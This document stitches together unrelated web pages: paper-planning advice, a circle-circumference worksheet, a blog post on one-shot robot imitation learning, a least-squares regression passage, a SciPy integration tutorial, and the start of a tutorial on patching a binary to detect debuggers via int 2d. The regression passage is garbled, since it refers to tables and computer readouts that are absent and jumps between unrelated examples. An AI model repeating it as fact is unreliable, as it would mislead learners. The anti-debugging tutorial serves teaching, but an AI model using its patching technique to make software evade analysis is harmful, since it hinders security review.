Making a plan for a paper
This is how I think about it. What works for you may be different. Just like orienteering, there are two main steps: finding out where you are and then determining what you need to do next.
Key statements and evidence (i.e., plots and figures)
Each paper is made up of a few key logical statements, supported by evidence. The evidence typically comes in the form of either data or mathematical proof.
Let's go through the paper from the reading (https://arxiv.org/abs/2009.13556). In that exercise we identified some key statements:
- The objective function $O[\Psi] = E[\Psi] + \sum_i^N \lambda_i |S_i|^2$ has the N+1’th excited state as its minimum if $\lambda_i > E_N-E_i$.
- A method optimizing the objective function $O[\Psi]$ enables optimization of orbitals, determinant coefficients, and Jastrow parameters.
- A CASCI-J wave function agrees with full CI for H2, using this method.
- DMC on a CASCI-J wave function, with all parameters optimized agrees with CC3 within around 0.24 eV for benzene. For fixed parameters the difference is 0.35 eV.
Now let’s think about what evidence supports each of those statements:
- There is a proof of this statement in Section II A.
- This is shown in figures demonstrating that the optimized orbitals are lower in energy than unoptimized orbitals.
- Figure 3 shows exactly this by plotting energy versus bond length, with color indicating the method used.
- Tables II and III.
To plan your paper, you should try to match up logical statements to evidence in a similar way. Note that if you look at the paper closely, there are more logical statements and more evidence than just the four I've listed here. During the writing of the paper, we typically try many versions of statement/evidence pairs before we settle on the final ones. Over the course of writing, on the order of 100 were generated, but we only considered 5-10 at a time.
Understand what you know now
Idea generation: statement/evidence pairs
In this phase, just try to write down statements and evidence that would be required to show the statements. For evidence, usually it comes in the form of a plot. Write down the x- and y-axes of the plot, and what quantities are being plotted. Try to make the statements as atomic as possible; it’s totally ok (and useful) to plot different views of the same data. I think it’s usually best to aim for around 5-10 statement/evidence pairs at a time.
Now look at your statements. Are some of them redundant? Try to figure out the minimal set of statement/evidence pairs that still amount to the same thing logically. Don’t try to combine two statements that are saying different things, but do try to combine statements that are saying the same thing in slightly different ways.
Forming a hierarchy of statements
Now look at your statements. Which are more important than others, and to whom? Think about who might be interested in which statements. You might not be sure about some of them. That’s ok, but it does mean that you may not want to emphasize that particular statement. For example, from above:
- The proof is mainly interesting to method developers.
- That orbital optimization matters for excited states is mainly interesting to people seeking to apply the method to other systems.
Find the key statements
Now we want to figure out what the project is about. Are there any statements contained in your list that you think summarize the work best? Or maybe is there a meta-statement? If you had two sentences to describe the work, what would you say?
Make a plan to finish the paper
Now go through the evidence required for your revised statement list. Making the plan is very simple; just figure out what you need to do to finish the plots and proofs, and make a plan for doing that! | <urn:uuid:7e91d7a6-6163-4fc1-87af-3bb5ea03c362> | CC-MAIN-2023-14 | http://wagner.physics.illinois.edu/resources/planning_a_paper/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948900.50/warc/CC-MAIN-20230328232645-20230329022645-00003.warc.gz | en | 0.932722 | 889 | 2.546875 | 3 |
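One lightweight way to do this bookkeeping is to keep the statement/evidence pairs in a small data structure and derive the to-do list from it. A sketch in Python; every entry below is made up for illustration:

```python
# Track statement/evidence pairs and derive a work plan from them.
# All entries are illustrative, not taken from a real paper plan.
pairs = [
    {"statement": "the objective has the target excited state as its minimum",
     "evidence": "proof in Section II A", "done": True},
    {"statement": "orbital optimization lowers the excited-state energy",
     "evidence": "plot: energy vs. bond length, colored by method", "done": False},
    {"statement": "DMC agrees with the reference method for the test molecule",
     "evidence": "table of excitation energies", "done": False},
]

# The plan to finish the paper is exactly the evidence not yet produced.
todo = [p["evidence"] for p in pairs if not p["done"]]
for item in todo:
    print(item)
```

Anything whose evidence is not yet produced becomes the plan for finishing the paper.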
Circumference and Wheels
Let’s explore how far different wheels roll.
The diameter of a bike wheel is 27 inches. If the wheel makes 15 complete rotations, how far does the bike travel?
The wheels on Kiran's bike are 64 inches in circumference. How many times do the wheels rotate if Kiran rides 300 yards?
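Both of the first two problems turn on the same fact: one complete rotation rolls the wheel forward exactly one circumference. A quick Python sketch of the arithmetic (all lengths in inches):

```python
import math

# Problem 1: a 27-inch-diameter wheel makes 15 complete rotations.
circumference = math.pi * 27       # one rotation covers one circumference
distance_in = 15 * circumference   # about 1272.3 inches, roughly 106 feet

# Problem 2: a 64-inch-circumference wheel, riding 300 yards.
ride_in = 300 * 36                 # 36 inches per yard
rotations = ride_in / 64           # 168.75 rotations

print(round(distance_in, 1), rotations)
```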
The numbers are measurements of radius, diameter, and circumference of circles A and B. Circle A is smaller than circle B. Which number belongs to which quantity?
2.5, 5, 7.6, 15.2, 15.7, 47.7
Circle A has circumference \(2\frac23\) m. Circle B has a diameter that is \(1\frac12\) times as long as Circle A’s diameter. What is the circumference of Circle B?
The length of segment \(AE\) is 5 centimeters.
- What is the length of segment \(CD\)?
- What is the length of segment \(AB\)?
- Name a segment that has the same length as segment \(AB\). | <urn:uuid:4581b866-4d4d-47b6-9442-e576dc2ac219> | CC-MAIN-2023-14 | https://im.kendallhunt.com/MS/students/2/3/5/practice.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945183.40/warc/CC-MAIN-20230323194025-20230323224025-00203.warc.gz | en | 0.875072 | 244 | 2.921875 | 3 |
By Tianhe Yu and Chelsea Finn
Learning a new skill by observing another individual, the ability to imitate, is a key part of intelligence in human and animals. Can we enable a robot to do the same, learning to manipulate a new object by simply watching a human manipulating the object just as in the video below?
The robot learns to place the peach into the red bowl after watching the human do so.
Such a capability would make it dramatically easier for us to communicate new goals to robots – we could simply show robots what we want them to do, rather than teleoperating the robot or engineering a reward function (an approach that is difficult as it requires a full-fledged perception system). Many prior works have investigated how well a robot can learn from an expert of its own kind (i.e. through teleoperation or kinesthetic teaching), which is usually called imitation learning. However, imitation learning of vision-based skills usually requires a huge number of demonstrations of an expert performing a skill. For example, a task like reaching toward a single fixed object using raw pixel input requires 200 demonstrations to achieve good performance according to this prior work. Hence a robot will struggle if there’s only one demonstration presented.
Moreover, the problem becomes even more challenging when the robot needs to imitate a human showing a certain manipulation skill. First, the robot arm looks significantly different from the human arm. Second, engineering the right correspondence between human demonstrations and robot demonstrations is unfortunately extremely difficult. It's not enough to simply track and remap the motion: the task depends much more critically on how this motion affects objects in the world, and we need a correspondence that is centrally based on the interaction.
To enable the robot to imitate skills from one video of a human, we can allow it to incorporate prior experience, rather than learn each skill completely from scratch. By incorporating prior experience, the robot should also be able to quickly learn to manipulate new objects while being invariant to shifts in domain, such as a person providing a demonstration, a varying background scene, or different viewpoint. We aim to achieve both of these abilities, few-shot imitation and domain invariance, by learning to learn from demonstration data. The technique, also called meta-learning and discussed in this previous blog post, is the key to how we equip robots with the ability to imitate by observing a human.
So how can we use meta-learning to make a robot quickly adapt to many different objects? Our approach is to combine meta-learning with imitation learning to enable one-shot imitation learning. The core idea is that provided a single demonstration of a particular task, i.e. maneuvering a certain object, the robot can quickly identify what the task is and successfully solve it under different circumstances. A prior work on one-shot imitation learning achieves impressive results on simulated tasks such as block-stacking by learning to learn across tens of thousands of demonstrations. If we want a physical robot to be able to emulate humans and manipulate a variety of novel objects, we need to develop a new system that can learn to learn from demonstrations in the form of videos, using a dataset that can be practically collected in the real world. First, we'll discuss our approach for visual imitation of a single demonstration collected via teleoperation. Then, we'll show how it can be extended for learning from videos of humans.
In order to make robots able to learn from watching videos, we combine imitation learning with an efficient meta-learning algorithm, model-agnostic meta-learning (MAML). This previous blog post gives a nice overview of the MAML algorithm. In this approach, we use a standard convolutional neural network with parameters $\theta$ as our policy representation, mapping from an image $o_t$ from the robot’s camera and the robot configuration $x_t$ (e.g. joint angles and joint velocities) to robot actions $a_t$ (e.g. the linear and angular velocity of the gripper) at time step $t$.
There are three main steps in this algorithm.
Three steps for our meta-learning algorithm.
First, we collected a large dataset containing demonstrations of a teleoperated robot performing many different tasks, which in our case correspond to manipulating different objects. During the second step, we use MAML to learn an initial set of policy parameters $\theta$ such that, after being provided a demonstration for a certain object, we can run gradient descent with respect to the demonstration to find a generalizable policy with parameters $\theta'$ for that object. When using teleoperated demonstrations, the policy updates can be computed by comparing the policy's predicted action $\pi_\theta(o_t)$ to the expert action $a_t$ recorded in the demonstration.
Then, we optimize for the initial parameters $\theta$ by driving the updated policy to match the actions from another demonstration with the same object. After meta-training, we can ask the robot to manipulate completely unseen objects by computing gradient steps using a single demonstration of that task. This step is called meta-testing.
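To make the inner-loop adaptation concrete, here is a minimal numerical sketch. It stands in a linear policy and a squared-error behavioral cloning loss for the convolutional network and autodiff used in the actual method, so every name and dimension below is an illustrative assumption:

```python
import numpy as np

def bc_loss_and_grad(theta, obs, expert_actions):
    """Behavioral-cloning-style loss: mean squared error between the
    linear policy's predicted actions (obs @ theta.T) and the expert
    actions, plus its analytic gradient with respect to theta."""
    preds = obs @ theta.T                 # predicted actions, shape (T, A)
    err = preds - expert_actions
    loss = np.mean(err ** 2)
    grad = 2.0 * err.T @ obs / err.size   # gradient w.r.t. theta, shape (A, D)
    return loss, grad

def inner_update(theta, demo_obs, demo_actions, alpha=0.1):
    """One gradient step on a single demonstration: theta' = theta - alpha*grad."""
    _, grad = bc_loss_and_grad(theta, demo_obs, demo_actions)
    return theta - alpha * grad

rng = np.random.default_rng(0)
theta = rng.normal(size=(2, 3))           # action_dim=2, obs_dim=3 (toy sizes)
demo_obs = rng.normal(size=(20, 3))       # 20 timesteps of observations
expert_theta = rng.normal(size=(2, 3))    # pretend "task" the demo solves
demo_actions = demo_obs @ expert_theta.T  # expert actions for this task

loss_before, _ = bc_loss_and_grad(theta, demo_obs, demo_actions)
theta_adapted = inner_update(theta, demo_obs, demo_actions)
loss_after, _ = bc_loss_and_grad(theta_adapted, demo_obs, demo_actions)
print(loss_after < loss_before)
```

Meta-training then adjusts the initial `theta` so that this single adaptation step produces a policy that matches a second demonstration of the same task.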
As the method does not introduce any additional parameters for meta-learning and optimization, it turns out to be quite data-efficient. Hence it can perform various control tasks such as pushing and placing by just watching a teleoperated robot demonstration:
Placing items into novel containers using a single demonstration. Left: demo. Right: learned policy.
The above method still relies on demonstrations coming from a teleoperated robot rather than a human. To this end, we designed a domain-adaptive one-shot imitation approach building on the above algorithm. We collected demonstrations of many different tasks performed by both teleoperated robots and humans. Then, we provide the human demonstration for computing the policy update and evaluate the updated policy using a robot demonstration performing the same task. A diagram illustrating this algorithm is below:
Overview of domain-adaptive meta-learning.
Unfortunately, as a human demonstration is just a video of a human performing the task, which doesn't contain the expert actions, we can't calculate the policy update defined above. Instead, we propose to learn a loss function for updating the policy, a loss function that doesn't require action labels. The intuition behind learning a loss function is that we can acquire a function that only uses the available inputs, the unlabeled video, while still producing gradients that are suitable for updating the policy parameters in a way that produces a successful policy. While this might seem like an impossible task, it is important to remember that the meta-training process still supervises the policy with true robot actions after the gradient step. The role of the learned loss therefore may be interpreted as simply directing the parameter update to modify the policy to pick up on the right visual cues in the scene, so that the meta-trained action output will produce the right actions. We represent the learned loss function using temporal convolutions, which can extract temporal information in the video demonstration.
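As a rough illustration of the idea (not the actual architecture), a learned loss built from a temporal convolution over per-frame video features might look like the following sketch; the weights here are random stand-ins for what would be meta-learned parameters:

```python
import numpy as np

def learned_loss(frame_feats, conv_w, out_w):
    """Action-free 'learned loss' sketch: a valid 1-D temporal convolution
    over per-frame features (frame_feats: (T, C), conv_w: (K, C)),
    a ReLU, and mean pooling down to a single scalar."""
    T, C = frame_feats.shape
    K = conv_w.shape[0]
    conv = np.array([np.sum(frame_feats[t:t + K] * conv_w)
                     for t in range(T - K + 1)])
    hidden = np.maximum(conv, 0.0)        # ReLU
    return float(out_w * hidden.mean())   # pooled scalar loss

rng = np.random.default_rng(1)
feats = rng.normal(size=(16, 8))          # 16 frames, 8 features per frame
conv_w = rng.normal(size=(3, 8))          # temporal kernel spanning 3 frames
loss = learned_loss(feats, conv_w, out_w=1.0)
```

During meta-training, the gradient of this scalar with respect to the policy parameters (which would produce `frame_feats` in the real pipeline) drives the inner-loop update, while the outer loop tunes the loss weights so that the update yields a successful policy.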
We refer to this method as domain-adaptive meta-learning algorithm, as it learns from data (e.g. videos of humans) from a different domain as the domain that the robot’s policy operates in. Our method enables a PR2 robot to effectively learn to push many different objects that are unseen during meta-training toward target positions:
Learning to push a novel object by watching a human.
and pick up many objects and place them onto target containers by watching a human manipulates each object:
Learning to pick up a novel object and place it into a previously unseen bowl.
We also evaluated the method using human demonstrations collected in a different room with a different camera. The robot still performs these tasks reasonably well:
Learning to push a novel object by watching a human in a different environment from a different viewpoint.
Now that we’ve taught a robot to learn to manipulate new objects by watching a single video (which we also demonstrated at NIPS 2017), a natural next step is to further scale these approaches to the setting where different tasks correspond to entirely distinct motions and objectives, such as using a wide variety of tools or playing a wide variety of sports. By considering significantly more diversity in the underlying distribution of tasks, we hope that these models will be able to achieve broader generalization, allowing robots to quickly develop strategies for new situations. Further, the techniques we developed here are not specific to robotic manipulation or even control. For instance, both imitation learning and meta-learning have been used in the context of language (examples here and here respectively). In language and other sequential decision-making settings, learning to imitate from a few demonstrations is an interesting direction for future work.
We would like to thank Sergey Levine and Pieter Abbeel for valuable feedback when preparing this blog post. This article was initially published on the BAIR blog, and appears here with the authors’ permission.
This post is based on the following papers:
One-Shot Visual Imitation Learning via Meta-Learning
Finn C., Yu T., Zhang T., Abbeel P., Levine S. CoRL 2017
paper, code, videos
One-Shot Imitation from Observing Humans via Domain-Adaptive Meta-Learning
Yu T., Finn C., Xie A., Dasari S., Zhang T., Abbeel P., Levine S. RSS 2018 | <urn:uuid:1b5f58dc-ce29-4f00-b009-93b922b4b5c1> | CC-MAIN-2023-14 | https://robohub.org/one-shot-imitation-from-watching-videos/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945183.40/warc/CC-MAIN-20230323194025-20230323224025-00203.warc.gz | en | 0.910243 | 1,919 | 3.34375 | 3 |
The graph shows that the regression line is the line that comes closest to the maximum number of points. The least-squares method is usually credited to Carl Friedrich Gauss, but it was first published by Adrien-Marie Legendre. Numerical smoothing and differentiation is an application of polynomial fitting.
The number of hours students studied and their exam results are recorded in the table below. Luckily, there is a straightforward formula for finding these. In the image below, you can see a 'line of best fit' for four data points. Outlying points, in fact, can skew the results of the least-squares analysis.
What is ordinary least squares regression analysis?
When calculating least squares regressions by hand, the first step is to find the means of the dependent and independent variables. We do this because of an interesting quirk within linear regression lines – the line will always cross the point where the two means intersect. We can think of this as an anchor point, as we know that the regression line in our test score data will always cross (4.72, 64.45). For nonlinear least squares fitting to a number of unknown parameters, linear least squares fitting may be applied iteratively to a linearized form of the function until convergence is achieved.
Here, since we have a computer readout, we can tell that "Ownership" has to be the x-variable. Thus, the x-variable is the number of months of Phanalla phone ownership, and the y-variable is the lifespan in years. Since we have an equation, we can directly read off the slope: the coefficient multiplying x.
Least Squares Linear Regression explanation
The line which has the least sum of squares of errors is the best fit line. Since the least squares line minimizes the squared distances between the line and our points, we can think of this line as the one that best fits our data. This is why the least squares line is also known as the line of best fit.
In regression analysis, dependent variables are illustrated on the vertical y-axis, whereas independent variables are illustrated on the horizontal x-axis. A first thought for a measure of the goodness of fit of the line to the data would be simply to add the errors at every point, but the example shows that this cannot work well in general. The line does not fit the data perfectly, yet because of cancellation of positive and negative errors the sum of the errors is zero. Instead, goodness of fit is measured by the sum of the squares of the errors.
The performance rating for a technician with 20 years of experience is estimated to be 92.3. The table shows the age in years and the retail value in thousands of dollars of a random sample of ten automobiles of the same make and model. We use \(b_0\) and \(b_1\) to represent the point estimates of the parameters \(\beta _0\) and \(\beta _1\).
What is meant by least square method?
The line fitted in least squares regression follows a negative trend in the data; students who have higher family incomes tended to have lower gift aid from the university. In a more general straight-line equation, x and y are coordinates, m is the slope, and b is the y-intercept. Because this equation describes a line in terms of its slope and its y-intercept, it is known as the slope-intercept form. For this reason, given the important property that the error mean is independent of the independent variables, the distribution of the error term is not an important issue in regression analysis. A very common model is the straight-line model, which is used to test whether there is a linear relationship between the independent and dependent variables. The variables are said to be correlated if a linear relationship exists.
- This analysis could help the investor predict the degree to which the stock’s price would likely rise or fall for any given increase or decrease in the price of gold.
- However, it is more common to explain the strength of a linear fit using R2, called R-squared.
- Now we have all the information needed for our equation and are free to slot in values as we see fit.
- In the case of the least squares regression line, however, the line that best fits the data, the sum of the squared errors can be computed directly from the data using the following formula.
Out of all possible lines, the linear regression model comes up with the best fit line with the least sum of squares of error. The slope and intercept of the best fit line are the model coefficients. Linear regression is one of the most important algorithms in machine learning. It is the statistical way of measuring the relationship between one or more independent variables and one dependent variable. Linear regression ends up being a lot more than this, but when you plot a "trend line" in Excel or use either of the methods you've mentioned, they're all the same.
The regression line \(y = kx + d\), where k is the linear regression slope and d is the intercept, has been superimposed on the scatter plot for the sample data set. This is the expression we would like to find for the regression line. Since x describes our data points, we need to find k and d. To find the least-squares regression line, we first need to find the linear regression equation. When applying the least-squares method you are minimizing the sum S of squared residuals r.
Different lines through the same set of points would give a different set of distances. We want these distances to be as small as we can make them. Since our distances can be either positive or negative, simply summing them would let positive and negative distances cancel each other out.
If we assume that there is some variation in our data, we can disregard the possibility that either of these standard deviations is zero. Therefore the sign of the correlation coefficient will be the same as the sign of the slope of the regression line. In general, straight lines have slopes that are positive, negative, or zero.
We are told that we are treating the temperature, in degrees Fahrenheit, as the x-variable. By process of elimination, the boot time of the computer, given in seconds, must be the y-variable. Now let’s look at actually writing up such interpretations for a couple example problems. We’ll look at one example where we are given the equation of a least-squares regression line, and one where we’ll look at a computer printout. But this is a case of extrapolation, just as part was, hence this result is invalid, although not obviously so.
It is also efficient under the assumption that the errors have finite variance and are homoscedastic, meaning that \(E[\varepsilon_i^2 | x_i]\) does not depend on i. The existence of such a covariate will generally lead to a correlation between the regressors and the response variable, and hence to an inconsistent estimator of β. The condition of homoscedasticity can fail with either experimental or observational data. If the goal is either inference or predictive modeling, the performance of OLS estimates can be poor if multicollinearity is present, unless the sample size is large.
In Python, there are many different ways to conduct least squares regression. For example, we can use packages such as numpy, scipy, statsmodels, or sklearn to get a least squares solution. Here we will use the above example and introduce more ways to do it. Slope and intercept are model coefficients or model parameters. The coefficient of determination, or R-squared, measures how much variance in y is explained by the model.
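As a small runnable illustration of the numpy route (the data points below are made up), the closed-form slope and intercept agree with `np.polyfit`:

```python
import numpy as np

# Fit y = k*x + d by least squares in two ways and check they agree.
x = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
y = np.array([2.1, 3.9, 6.2, 7.8, 10.1])   # made-up, roughly linear data

# Closed form: k = cov(x, y) / var(x), d = ybar - k * xbar
xbar, ybar = x.mean(), y.mean()
k = np.sum((x - xbar) * (y - ybar)) / np.sum((x - xbar) ** 2)
d = ybar - k * xbar                        # slope ≈ 1.99, intercept ≈ 0.05

# Same fit via numpy's polynomial least squares (highest degree first)
k2, d2 = np.polyfit(x, y, 1)
print(np.allclose([k, d], [k2, d2]))
```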
Here s_x denotes the standard deviation of the x coordinates and s_y the standard deviation of the y coordinates of our data. The sign of the correlation coefficient is directly related to the sign of the slope of our least squares line. For categorical predictors with just two levels, the linearity assumption will always be satisfied. However, we must evaluate whether the residuals in each group are approximately normal and have approximately equal variance. As can be seen in Figure 7.17, both of these conditions are reasonably satisfied by the auction data.
Features of the Least Squares Line
However, the blue line passes through four data points, and the distances (residuals) between the data points and the blue line are minimal compared to the other two lines. There are a few features that every least squares line possesses. The first item of interest deals with the slope of our line. The slope has a connection to the correlation coefficient of our data.
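That connection is the identity slope = r · (s_y / s_x), where r is the correlation coefficient and s_x, s_y are the standard deviations of the coordinates introduced earlier. A quick numerical check (my own sketch; the data are arbitrary):

```python
import numpy as np

# Arbitrary data; any x and y with nonzero spread will do
x = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
y = np.array([2.0, 1.0, 4.0, 3.0, 5.0])

r = np.corrcoef(x, y)[0, 1]        # correlation coefficient
s_x, s_y = np.std(x), np.std(y)    # same ddof for both, so the ratio is unaffected
slope = np.polyfit(x, y, 1)[0]     # least squares slope

print(np.isclose(slope, r * s_y / s_x))  # True
```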
To achieve this, all of the returns are plotted on a chart. The index returns are then designated as the independent variable, and the stock returns are the dependent variable. The line of best fit provides the analyst with coefficients explaining the level of dependence. Least squares regression is used for predicting a dependent variable given an independent variable using data you have collected. While you could deduce that for any length of time above 5 hours, 100% would be a good prediction, this is beyond the scope of the data and the linear regression model.
Here a model is fitted to provide a prediction rule for application in a situation similar to that to which the data used for fitting apply. The dependent variables corresponding to such future application would be subject to the same types of observation error as those in the data used for fitting. It is therefore logically consistent to use the least-squares prediction rule for such data. A data point may consist of more than one independent variable.
The slope −2.05 means that for each unit increase in x the average value of this make and model of vehicle decreases by about 2.05 units (about $2,050). To learn the meaning of the slope of the least squares regression line. Here you find a comprehensive list of resources to master machine learning and data science. In contrast to a linear problem, a non-linear least-squares problem has no closed-form solution and is generally solved by iteration.
On the quad or trapz'd in ChemE heaven
Posted February 02, 2013 at 09:00 AM | categories: integration, python | tags:
Updated February 27, 2013 at 02:53 PM
What is the difference between quad and trapz? The short answer is that quad integrates functions (via a function handle) using numerical quadrature, and trapz performs integration of arrays of data using the trapezoid method.
Let us look at some examples. We consider the example of computing \(\int_0^2 x^3 dx\). The analytical integral is \(\frac{1}{4} x^4\), so we know the integral evaluates to 16/4 = 4. This will be our benchmark for comparison to the numerical methods.
We use the scipy.integrate.quad command to evaluate this \(\int_0^2 x^3 dx\).
from scipy.integrate import quad

ans, err = quad(lambda x: x**3, 0, 2)
print(ans)
You can also define a function for the integrand.
from scipy.integrate import quad

def integrand(x):
    return x**3

ans, err = quad(integrand, 0, 2)
print(ans)
1 Numerical data integration
If we have numerical data like this, we use trapz to integrate it:
import numpy as np

x = np.array([0, 0.5, 1, 1.5, 2])
y = x**3
i2 = np.trapz(y, x)
error = (i2 - 4) / 4
print(i2, error)
Note the integral of these vectors is greater than 4! You can see why here.
import numpy as np
import matplotlib.pyplot as plt

x = np.array([0, 0.5, 1, 1.5, 2])
y = x**3

x2 = np.linspace(0, 2)
y2 = x2**3

plt.plot(x, y, label='5 points')
plt.plot(x2, y2, label='50 points')
plt.legend()
plt.savefig('images/quad-1.png')
The trapezoid method is overestimating the area significantly. With more points, we get much closer to the analytical value.
import numpy as np

x2 = np.linspace(0, 2, 100)
y2 = x2**3
print(np.trapz(y2, x2))
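The improvement with more points is no accident: the composite trapezoid rule has an O(h²) error, so shrinking the spacing by 10× shrinks the error by roughly 100×. A quick check (my addition, not part of the original post; the hasattr guard covers NumPy 2.0, which renamed trapz to trapezoid):

```python
import numpy as np

# np.trapz was renamed np.trapezoid in NumPy 2.0
trap = np.trapezoid if hasattr(np, "trapezoid") else np.trapz

def trapz_error(n):
    """Trapezoid-rule error for integrating x**3 on [0, 2] with n points."""
    x = np.linspace(0, 2, n)
    return trap(x**3, x) - 4.0

e_coarse = trapz_error(5)   # spacing h = 0.5
e_fine = trapz_error(41)    # spacing h = 0.05, ten times smaller
print(e_coarse / e_fine)    # about 100, consistent with error ~ h**2
```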
2 Combining numerical data with quad
You might want to combine numerical data with the quad function when you need to integrate over only part of your data range. Let us say you are given this data:
x = [0 0.5 1 1.5 2];
y = [0 0.1250 1.0000 3.3750 8.0000];
and you want to integrate this from x = 0.25 to 1.75. We do not have data in those regions, so some interpolation is going to be needed. Here is one approach.
from scipy.interpolate import interp1d
from scipy.integrate import quad
import numpy as np

x = [0, 0.5, 1, 1.5, 2]
y = [0, 0.1250, 1.0000, 3.3750, 8.0000]

f = interp1d(x, y)

# numerical trapezoid method
xfine = np.linspace(0.25, 1.75)
yfine = f(xfine)
print(np.trapz(yfine, xfine))

# quadrature with interpolation
ans, err = quad(f, 0.25, 1.75)
print(ans)
These approaches are very similar, and both rely on linear interpolation. The second approach is simpler, and uses fewer lines of code.
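A third option, not covered in the original comparison, is Simpson's rule for sampled data. Simpson's rule is exact for polynomials up to degree 3, so on this particular data it recovers the analytical answer from only five points (the function is called simps in older SciPy releases, simpson in current ones):

```python
import numpy as np
from scipy.integrate import simpson  # named 'simps' in older SciPy releases

x = np.array([0, 0.5, 1, 1.5, 2])
y = x**3

result = simpson(y, x=x)
print(result)  # 4.0 to machine precision: Simpson's rule is exact for cubics
```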
trapz and quad are functions for computing integrals. Both can be used with numerical data if interpolation is used. The syntax of the quad and trapz functions differs between scipy and Matlab.
Finally, see this post for an example of solving an integral equation using quad and fsolve.
Copyright (C) 2013 by John Kitchin. See the License for information about copying. | <urn:uuid:9dc3c86d-7b2c-49a3-808c-83449e5c349d> | CC-MAIN-2023-14 | https://kitchingroup.cheme.cmu.edu/blog/2013/02/02/On-the-quad-or-trapz-d-in-ChemE-heaven/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948756.99/warc/CC-MAIN-20230328011555-20230328041555-00603.warc.gz | en | 0.742838 | 940 | 3.09375 | 3 |
- Explore the behavior difference of debuggers on int 2dh.
- Debugging and modification of binary executable programs.
- Basic control flow constructs in x86 assembly.
Challenge of the Day:
- Computer Architecture
- Operating Systems
- Operating Systems Security
- Software Engineering
- Find out as many ways as possible to make a program (using int 2d) run differently in a debugged environment than in a regular execution.
The behavior of the int 2d instruction may be affected by many factors, e.g., the SEH handler installed by the program itself, whether the program is running under a ring 3 debugger, whether the OS is running in debug mode, the program logic of the OS exception handler (KiDispatchException), and the values of the registers when int 2d is invoked (which determine the service that is requested). In the following, we use an experimental approach to explore the possible ways to make a program behave differently when running in a virtual machine and a debugged environment.
2. Lab Configuration
In addition to the Immunity Debugger, we are going to use WinDbg in this tutorial. Before we proceed, we need to configure it properly on the host machine and the guest XP.
If you have not installed the guest VM, please follow the instructions of Tutorial 1. Pay special attention to Section 3.1 (how to set up the serial port of the XP guest). In the following we assume that the pipe path on the host machine is \\.\pipe\com_11 and the guest OS is using COM1. The installation of WinDbg on the host machine can follow the instructions on MSDN.
We need to further configure the XP guest to make it work.
(1) Revision of c:\boot.ini.
This is to set up a second booting option for the debug mode. The file is shown as below, you can modify yours correspondingly. Note that we set COM1 as the debug port.
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="DEBUGGED VERSION" /noexecute=optin /fastdetect /debug /debugport=com1 /baudrate=115200
(2) Manual configuration of COM ports.
In some versions of XP, COM ports have to be manually configured. You can follow jorgensen's tutorial on "How to Add a Serial Port in Windows XP and 7 Guest" (follow the XP part). It consists of two steps: (1) manually add a COM port in Control Panel and (2) manually configure COM1 as the port number.
(3) Test run of WinDbg.
Start your XP guest in the debug mode. Now in the host machine, launch the "Windows SDK 7.1" command window that comes with WinDbg. Change directory to "c:\Program Files\Debugging Tools for Windows (x86)" and type the following. You should get a window as shown in Figure 1.
windbg -b -k com:pipe,port=\\.\pipe\com_11
You might notice that currently you are not able to access your XP guest. This is because WinDbg has halted its execution. Simply type "g" (standing for "go") in the WinDbg window, and let the XP guest continue.
3. Experiment 1: Int 2d on Cygwin
|Figure 1: Screenshot of WinDbg|
In the following, we demonstrate some of the interesting behaviors of int 2d using a simple program, Int2dPrint.exe. The C++ source of the program is shown below. The output of the program should be "AAAABBBB". We added an fflush(stdout) to force output in an eager mode, and before each printf() statement there are five integer operations that allow us to insert additional machine code later.
int a = 0;
int b = 0;
int c = 0;
int d = 0;
int e = 0;
a = 0; b = 0; c = 0; d = 0; e = 0;
Source code of Int2dPrint.exe
Figure 2 shows the assembly of the compiled code. Clearly, the 'MOV [EBP-xx], 0' instructions between 0x4010BA and 0x4010D6 correspond to the integer assignments "int a=0" etc. in the source program. The "MOV [ESP], 0x402020" at 0x4010DD pushes the parameter (the starting address of the constant string "AAAA") onto the stack for the printf() call. Also note that before the fflush call at 0x4010F4, the program calls cygwin.__getreent. This retrieves the thread-specific re-entrant structure so that stdout (the file descriptor of the standard output) can be obtained. In fact, you can infer that stdout is located at offset 0x8 of the re-entrant structure.
3.1 Patching Binary Code
|Figure 2. Compiled Binary of Int2dPrint.cc|
Now let us roll up our sleeves and prepare to patch Int2dPrint.exe. The binary program is compiled using g++ under Cygwin. To run it, you need the cygwin1.dll in Cygwin's bin folder. You can choose to compile it yourself, or use the one provided in the zipped project folder.
Make sure that your XP guest is running in NON-DEBUG mode!
We now add the following assembly code at location 0x4010F9 of Int2dPrint.exe (the first "int a=0" before the printf("BBBB")). Intuitively, the code tests the value of EAX after the int 2d call. If EAX is 0 (here "JZ" means Jump if Zero), the program will jump to 0x401138, which skips the printf("BBBB"). Notice that this occurs only when the instruction "inc EAX" is skipped.
xor EAX, EAX # set EAX=0;
int 2d # invoke the exception handler
inc EAX # if executed, will set EAX=1
cmp EAX, 0
JZ 0x401138 # if EAX=0, will skip printf("BBBB");
The assemble Code to Insert
The following shows you how to patch the code using IMM:
(1) Right click at 0x4010F9 in the CPU pane and choose "Assemble" (or simply press Spacebar at the location). Enter the code as above.
(2) Right click in the CPU pane, choose "Copy to Executable" --> "All Modified", then click "Copy All". A window of modified instructions will show up. Close that window and click "Yes" to save. Save the file as Int2dPrint_EAX_0_JZ0.exe. The name suggests that the EAX input parameter to the int 2d service is 0, and we expect it to skip the printf("BBBB") if EAX=0, i.e., the output of the program should be "AAAA" (this, of course, depends on whether the "inc EAX" instruction is executed or not).
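Outside of IMM, the same kind of patch can be applied programmatically. The sketch below is my own generic illustration, not part of the tutorial's toolchain: it overwrites bytes at a given file offset. The offset in the commented usage line is a hypothetical placeholder, since translating a virtual address such as 0x4010F9 into a file offset requires parsing the PE section headers (for example with a library like pefile), which is not shown here.

```python
def patch_bytes(path, file_offset, new_bytes):
    """Overwrite len(new_bytes) bytes at file_offset; return the original bytes."""
    with open(path, "r+b") as f:
        f.seek(file_offset)
        old = f.read(len(new_bytes))
        f.seek(file_offset)
        f.write(new_bytes)
    return old  # keep these around if you want to undo the patch

# Hypothetical usage: write XOR EAX,EAX / INT 2D / INC EAX (bytes 31 C0 CD 2D 40)
# at a file offset computed beforehand from the PE headers:
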